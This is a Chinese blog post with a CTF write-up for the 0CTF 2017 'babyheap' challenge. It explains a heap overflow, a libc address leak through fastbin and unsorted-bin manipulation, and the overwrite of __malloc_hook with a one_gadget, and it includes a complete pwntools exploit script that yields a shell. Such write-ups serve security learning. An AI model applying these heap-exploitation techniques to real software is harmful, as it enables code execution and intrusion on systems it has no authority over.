0CTF-babyheap2017祥讲

最新推荐文章于 2022-07-28 20:14:30 发布
最新推荐文章于 2022-07-28 20:14:30 发布
阅读量453 收藏 2
点赞数 3
分类专栏: # 例题分析 文章标签: babyheap Octf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/97289705
版权

解题思路

1. 查看文件信息,安全机制
2. IDA审计
3. 分析漏洞点
4. 编写EXP

1.基本信息

安全机制
在这里插入图片描述安全机制全部开启了,其实不用慌,对我们做题影响不是很大

运行
在这里插入图片描述

2.IDA审计

1.Allocate
在这里插入图片描述
2.Fill
在这里插入图片描述
3.Free
在这里插入图片描述
4.Dump
在这里插入图片描述
4.1
在这里插入图片描述

3. 分析漏洞点

每次都是利用UAF漏洞来泄露堆的地址,第一次尝试利用这个方法去获取堆的地址(好像叫重叠堆)
漏洞点
1.Fill的size大小没有限制,可以覆盖到后面的chunk
2.在free的时候,不存在uaf漏洞
3.dump只能dump出本chunk的内容

思考漏洞点
先考虑怎么获取堆的地址:
在这里插入图片描述
这样就获取到smallbin的main_arena的地址

alloc(0x20)
alloc(0x20)
alloc(0x20)
alloc(0x20)
alloc(0x80)

free(1)
free(2)
	
payload  = p64(0)*5
payload += p64(0x31)
payload += p64(0)*5
payload += p64(0x31)    #通过修改index(2)的fd指针将small chunk的地址写进fastbin链表中
payload += p8(0xc0)
fill(0, payload)


payload  = p64(0)*5
payload += p64(0x31)   #修改index(3),将index(4)的size位修改为和free chunk大小相同
fill(3, payload)

alloc(0x20)  #将index(2)的chunk 申请走
alloc(0x20)   #将我们伪造的index(4) 大小为0x20 chunk,申请走

payload  = p64(0)*5  #将伪造的chunk 还原回去
payload += p64(0x91)
fill(3, payload)

alloc(0x80) #这理多申请一个small,在我们想要获取堆地址的时候,最好是两个以上的同一个chunk来泄露    index = 5
free(4)  #先free 为下面寻找0x70的chunk,做准备

libc_base = u64(dump(2)[:8]) - 0x58-0x3c4b20   #0x3a5678
print ("---->") + hex(u64(dump(2)[:8]))

libc_base如何计算
在这里插入图片描述
hex(0x7ffff7dd1b20 - 0x7ffff7a0d000) = 0x3c4b20
0x58 就是main_arena 距离我们上图的距离0x58=88
vmmap
在这里插入图片描述
伪造chunk块,修改__malloc_hook

alloc(0x68)  #伪造chunk 在main_arena 里面找到一个合适的chunk大小  一般常用0x7f   index = 6
free(4)

fill(2, p64(libc_base + 0x3c4aed))    #main_arena的伪造chunkl地址
print ("1-->") + hex(libc_base + 0x3c4aed)
alloc(0x60) #将index= 4的 chunk申请走,
alloc(0x60) #将index = 4的fd ,chunk分配,这里就是我们伪造的chunk

payload  = '\x00'*3
payload += p64(0)*2
payload += p64(libc_base + 0x4526a)
print ("2-->") + hex(libc_base + 0x4526a)
fill(6, payload)

alloc(233) #这里已经将__malloc_hook,修改为onegadget ,只要调用了alloc就会获取shell
p.interactive()

bins
在这里插入图片描述

编写EXP

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#context.log_level='debug'
 
local = 1

if local:
	p = process("./babyheap")
	#elf = ELF("./level3_x64")
	#libc = ELF("libc-2.19.so")
else:
	p=remote("pwn2.jarvisoj.com",9883)
	elf = ELF("./level3_x64")
	libc = ELF("libc-2.19.so")

def alloc(size):
    p.sendline('1')
    p.sendlineafter(': ', str(size))
    p.recvuntil(': ', timeout=1)
 
def fill(idx, data):
    p.sendline('2')
    p.sendlineafter(': ', str(idx))
    p.sendlineafter(': ', str(len(data)))
    p.sendafter(': ', data)
    p.recvuntil(': ')
 
def free(idx):
    p.sendline('3')
    p.sendlineafter(': ', str(idx))
    p.recvuntil(': ')
 
def dump(idx):
    p.sendline('4')
    p.sendlineafter(': ', str(idx))
    p.recvuntil(': \n')
    data = p.recvline()
    p.recvuntil(': ')
    return data
 
p.recvuntil(': ')
alloc(0x20)
alloc(0x20)
alloc(0x20)
alloc(0x20)


alloc(0x80)
free(1)
free(2)
 	
payload  = p64(0)*5
payload += p64(0x31)
payload += p64(0)*5
payload += p64(0x31)
payload += p8(0xc0)
fill(0, payload)


payload  = p64(0)*5
payload += p64(0x31)   
fill(3, payload)
#gdb.attach(p) 
alloc(0x20)
alloc(0x20)   #chunk申请过来 

payload  = p64(0)*5  #将伪造的chunk 还原回去
payload += p64(0x91)
fill(3, payload)


alloc(0x80)
free(4)

libc_base = u64(dump(2)[:8]) - 0x58-0x3c4b20   #0x3a5678
print ("---->") + hex(u64(dump(2)[:8]))
#gdb.attach(p)
log.info("main-arena: " + hex(u64(dump(2)[:8])-0x58))
log.info("libc_base: " + hex(libc_base))

alloc(0x68)  #伪造chunk 在main_arena 里面找到一个合适的chunk大小  一般常用0x7f
free(4)

pause()
fill(2, p64(libc_base + 0x3c4aed))

print ("1-->") + hex(libc_base + 0x3c4aed)
alloc(0x60)
#gdb.attach(p) 
alloc(0x60)
#gdb.attach(p)

payload  = '\x00'*3
payload += p64(0)*2
payload += p64(libc_base + 0x4526a)
print ("2-->") + hex(libc_base + 0x4526a)
fill(6, payload)

alloc(233)
 
p.interactive()

后期在继续补充…

参考文献
https://www.cnblogs.com/jazm/p/11184380.html
https://bbs.pediy.com/thread-223461.htm

Jc^
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3792
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2796
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 629
babyheap
babyheap_0ctf_2017
m0sway的博客
11-25 526
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
0ctf Babyheap 2017
Bill
03-11 6397
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
0ctf-2017-pwn-char
02-05
2017年0ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
ctf-all-in-one
01-30
ctf-all-in-one
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
babyheap_0_ctf_2017
m0_48127441的博客
04-01 197
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
BUUCTF 0ctf_2017_babyheap
m0_57754423的博客
02-15 211
简单说一下这个题目的思路: 1.泄露libc: 编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。 2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。 这里解答一个疑惑,为什么不写got表? 1,首先 RELRO保护全开,是不可写的。 2,其次,bss段上很难找到数据通过size检查。 完整.
绝对详细的babyheap_0ctf_2017题解
xieyichensss的博客
04-24 1017
这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
0ctf_2017_babyheap
qq_46441427的博客
08-13 133
思路 查看了一下ida后,发现有堆溢出漏洞 那可以利用unsorted bin 泄露main arena的地址,然后在malloc_hook处构造fake_chunk ,利用one_gadget在malloc_hook写入函数值,可以getshell ps:注意本地libc的问题 exp及具体分析 from pwn import* context.log_level = 'debug' #p = process('./babyheap') p = remote('node4.buuoj.cn','289
0ctf2017 babyheap
pondzhang的专栏
12-06 160
from pwn import * #p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"}) p = remote("node3.buuoj.cn",26165) elf = ELF('./0ctf_2017_babyheap') libc = ELF("./libc-2.23.so") def Allocate(size): p.recvuntil('Command: ') p.sendl.
0ctf babyheap
qq_41071646的博客
05-13 475
这个题 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基址随机化 这就要我们自己把libc的基址给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道题 典型的菜单题 然后 看一下大概内容 有没...
0ctf2017-babyheap
weixin_30878361的博客
08-03 314
前言 又是一道令人怀疑人生的 baby 题。 这道题利用思路非常巧妙,通过 堆溢出 和 fastbin 的机制构造了 information leak, 然后通过 fastbin attack 可以读写 malloc_hook , 然后使用 one_gadget 来 getshell. 题目和 idb 文件:https://gitee.com/hac425/blog_data/tree/maste...
2017/2018-0ctf-babyheap-writeup
【xiaoxiaorenwu's blog】
04-07 769
因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018的babyheap和2017的babyheap做了一下汲取一下经验,感觉两题类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个题目放在一起来写,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。 首先提供两道题目的二进制文件:2017_0ctf_babyheap 2018...
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值